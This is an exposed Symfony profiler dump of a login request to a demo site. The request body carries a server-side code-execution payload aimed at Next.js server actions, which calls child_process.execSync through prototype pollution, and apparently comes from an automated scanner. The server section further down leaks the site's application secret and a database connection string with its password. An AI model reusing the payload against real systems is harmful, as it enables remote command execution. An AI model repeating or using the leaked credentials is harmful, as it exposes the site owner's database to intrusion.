https://demo.habdallah-inginfo.tn/admin/login

302 Redirect from
@homepage (da3570)
Forwarded to
ErrorController (b79e31)
Method
POST
HTTP Status
400
IP
16.176.230.69
Profiled on
Token
37c544

n/a

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0 
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1 
""$@0""
2 
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller 
"App\Controller\SecurityController::login"
_firewall_context 
"security.firewall.map.context.admin"
_redirected 
true
_remove_csp_headers 
true
_route 
"app_login"
_route_params 
[]
_security_firewall_run 
"_security_user"
_stopwatch_token 
"535b6c"

Request Headers

Header Value
accept 
"*/*"
accept-encoding 
"gzip, deflate"
content-length 
"753"
content-type 
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie 
"sf_redirect=%7B%22token%22%3A%22da3570%22%2C%22route%22%3A%22homepage%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CCoreController%22%2C%22method%22%3A%22indexAction%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fhabdalj%5C%2Fdemo%5C%2Fsrc%5C%2FController%5C%2FCoreController.php%22%2C%22line%22%3A19%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host 
"demo.habdallah-inginfo.tn"
next-action 
"x"
remote-ip 
"16.176.230.69"
user-agent 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-forwarded-for 
"16.176.230.69"
x-forwarded-proto 
"https"
x-nextjs-html-request-id 
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id 
"b5dce965"
x-ovhrequest-id 
"2a66a3ee7f4bafb0695d82c609ad433a"
x-php-ob-level 
"1"
x-predictor 
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control 
"no-cache, private"
content-type 
"text/html; charset=UTF-8"
date 
"Tue, 16 Dec 2025 14:52:17 GMT"
x-debug-exception 
"The%20key%20%22_username%22%20must%20be%20a%20string%2C%20%22NULL%22%20given."
x-debug-exception-file 
"%2Fhome%2Fhabdalj%2Fdemo%2Fvendor%2Fsymfony%2Fsecurity-http%2FAuthenticator%2FFormLoginAuthenticator.php:149"
x-debug-token 
"37c544"
x-debug-token-link 
"https://demo.habdallah-inginfo.tn/_profiler/b79e31"
x-previous-debug-token 
"b79e31"
x-robots-tag 
"noindex"

Cookies

Request Cookies

Key Value
sf_redirect 
"{"token":"da3570","route":"homepage","method":"GET","controller":{"class":"App\\Controller\\CoreController","method":"indexAction","file":"\/home\/habdalj\/demo\/src\/Controller\/CoreController.php","line":19},"status_code":302,"status_text":"Found"}"

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV 
"dev"
APP_SECRET 
"5b21c28a920922c3a38bcb9566a5e7b5"
DATABASE_URL 
"mysql://habdaljactivity:V1brC0UhNQrjUTp@habdaljactivity.mysql.db/habdaljactivity?serverVersion=5.7"
MAILER_DSN 
"gmail://USERNAME:PASSWORD@default"
MESSENGER_TRANSPORT_DSN 
"doctrine://default?auto_setup=0"

Defined as regular env variables

Key Value
APP_DEBUG 
"1"
CFG_CLUSTER 
"cluster128"
CONTENT_LENGTH 
"753"
CONTENT_TYPE 
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
DOCUMENT_ROOT 
"/home/habdalj/demo/public"
ENVIRONMENT 
"production"
FCGI_ROLE 
"RESPONDER"
GATEWAY_INTERFACE 
"CGI/1.1"
GEOIP_AREA_CODE 
"0"
GEOIP_COUNTRY_CODE 
"US"
GEOIP_COUNTRY_NAME 
"United States"
GEOIP_DMA_CODE 
"0"
GEOIP_LATITUDE 
"37.750999"
GEOIP_LONGITUDE 
"-97.821999"
HTTPS 
"on"
HTTP_ACCEPT 
"*/*"
HTTP_ACCEPT_ENCODING 
"gzip, deflate"
HTTP_COOKIE 
"sf_redirect=%7B%22token%22%3A%22da3570%22%2C%22route%22%3A%22homepage%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CCoreController%22%2C%22method%22%3A%22indexAction%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fhabdalj%5C%2Fdemo%5C%2Fsrc%5C%2FController%5C%2FCoreController.php%22%2C%22line%22%3A19%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST 
"demo.habdallah-inginfo.tn"
HTTP_NEXT_ACTION 
"x"
HTTP_REMOTE_IP 
"16.176.230.69"
HTTP_USER_AGENT 
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_FORWARDED_FOR 
"16.176.230.69"
HTTP_X_FORWARDED_PROTO 
"https"
HTTP_X_NEXTJS_HTML_REQUEST_ID 
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID 
"b5dce965"
HTTP_X_OVHREQUEST_ID 
"2a66a3ee7f4bafb0695d82c609ad433a"
HTTP_X_PREDICTOR 
"1"
PHP_SELF 
"/index.php"
PHP_VER 
"5_3"
QUERY_STRING 
""
REDIRECT_STATUS 
"200"
REDIRECT_URL 
"/admin/login"
REGISTER_GLOBALS 
"0"
REMOTE_ADDR 
"16.176.230.69"
REMOTE_PORT 
"24012"
REQUEST_METHOD 
"POST"
REQUEST_TIME 
1765896737
REQUEST_TIME_FLOAT 
1765896737.1594
REQUEST_URI 
"/admin/login"
SCRIPT_FILENAME 
"/home/habdalj/demo/public/index.php"
SCRIPT_NAME 
"/index.php"
SCRIPT_URI 
"https://demo.habdallah-inginfo.tn:443/admin/login"
SCRIPT_URL 
"/admin/login"
SERVER_ADDR 
"10.128.20.5"
SERVER_ADMIN 
"postmaster@demo.habdallah-inginfo.tn"
SERVER_NAME 
"demo.habdallah-inginfo.tn"
SERVER_PORT 
"443"
SERVER_PROTOCOL 
"HTTP/1.1"
SERVER_SIGNATURE 
""
SERVER_SOFTWARE 
"Apache"
SYMFONY_DOTENV_VARS 
"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL,MAILER_DSN"
UNIQUE_ID 
"aUFyIRdWZd-PTL0ShJmhvAAAAUE"
USER 
"habdalj"
argc 
0
argv 
[]

Sub Requests 1

ErrorController (token = b79e31)

Key Value
_controller 
"error_controller"
_stopwatch_token 
"37a6a3"
exception 
Symfony\Component\HttpKernel\Exception\BadRequestHttpException {#281
  #message: "The key "_username" must be a string, "NULL" given."
  #code: 0
  #file: "/home/habdalj/demo/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php"
  #line: 149
  -statusCode: 400
  -headers: []
  trace: {
    /home/habdalj/demo/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php:149 {
      Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator->getCredentials(Request $request): array …
      › if (!\is_string($credentials['username']) && (!\is_object($credentials['username']) || !method_exists($credentials['username'], '__toString'))) {    throw new BadRequestHttpException(sprintf('The key "%s" must be a string, "%s" given.', $this->options['username_parameter'], \gettype($credentials['username'])));}
    }
    /home/habdalj/demo/vendor/symfony/security-http/Authenticator/FormLoginAuthenticator.php:84 {
      Symfony\Component\Security\Http\Authenticator\FormLoginAuthenticator->authenticate(Request $request): Passport …
      › {    $credentials = $this->getCredentials($request);arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php:63 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator->authenticate(Request $request): PassportInterface …
      › $startTime = microtime(true);$this->passport = $this->authenticator->authenticate($request);$this->duration = microtime(true) - $startTime;
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:179 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › // get the passport from the Authenticator$passport = $authenticator->authenticate($request);arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:160 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
      arguments: {
        $authenticator: Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator {#206 …}
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:140 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
      arguments: {
        $authenticators: [ …1]
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:40 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:65 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › 
      › $this->authenticationManagerListener->authenticate($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:49 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event) …
      › try {    $ret = $this->listener->authenticate($event);} catch (LazyResponseException $e) {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event) …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:60 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->__invoke(RequestEvent $event) …
      › foreach ($listeners as $listener) {    $listener($event);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:70 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners) …
      › 
      ›     $listener($event);} else {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/security-http/Firewall.php:92 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
        $listeners: Generator {#243 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
        ...: {
          "kernel.request"
          Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#154 …}
        }
      }
    }
    /home/habdalj/demo/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
        $eventName: "kernel.request"
        $dispatcher: Symfony\Component\HttpKernel\Debug\TraceableEventDispatcher {#154 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
      arguments: {
        $listeners: [ …9]
        $eventName: "kernel.request"
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
      }
    }
    /home/habdalj/demo/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
      arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
        $eventName: "kernel.request"
      }
    }
    /home/habdalj/demo/vendor/symfony/http-kernel/HttpKernel.php:128 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);arguments: {
        $event: Symfony\Component\HttpKernel\Event\RequestEvent {#26 …}
        $eventName: "kernel.request"
      }
    }
    /home/habdalj/demo/vendor/symfony/http-kernel/HttpKernel.php:74 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
        $type: 1
      }
    }
    /home/habdalj/demo/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
        $type: 1
        $catch: true
      }
    }
    /home/habdalj/demo/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
      arguments: {
        $request: Symfony\Component\HttpFoundation\Request {#56 …}
      }
    }
    /home/habdalj/demo/vendor/autoload_runtime.php:35 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /home/habdalj/demo/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/home/habdalj/demo/vendor/autoload_runtime.php"
      }
    }
  }
}
logger 
Symfony\Bridge\Monolog\Logger {#17 …6}